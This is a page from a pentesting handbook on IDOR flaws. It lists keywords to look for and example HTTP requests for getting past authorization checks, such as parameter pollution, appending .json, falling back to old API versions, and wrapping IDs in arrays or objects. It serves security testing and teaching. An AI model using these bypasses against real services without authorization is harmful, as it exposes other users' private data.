Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
DNS rebinding
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
IDOR

Basics

Check for valuable words:
{regex + perm} id
{regex + perm} user
{regex + perm} account
{regex + perm} number
{regex + perm} order
{regex + perm} no
{regex + perm} doc
{regex + perm} key
{regex + perm} email
{regex + perm} group
{regex + perm} profile
{regex + perm} edit

Bypasses

  • Add parameters onto the endpoints for example, if there was
GET /api_v1/messages --> 401
vs
GET /api_v1/messages?user_id=victim_uuid --> 200
  • HTTP Parameter pollution
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK
GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
  • Add .json to the endpoint, if it is built in Ruby!
/user_data/2341 --> 401 Unauthorized
/user_data/2341.json --> 200 OK
  • Test on outdated API Versions
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
Wrap the ID with an array.
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
Wrap the ID with a JSON object:
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
JSON Parameter Pollution:
POST /api/get_profile
Content-Type: application/json
{“user_id”:<legit_id>,”user_id”:<victim’s_id>}
Previous
CRLF
Next
Web Cache Deception
Last modified 2yr ago
Export as PDF
Copy link
Edit on GitHub
Outline
Basics
Bypasses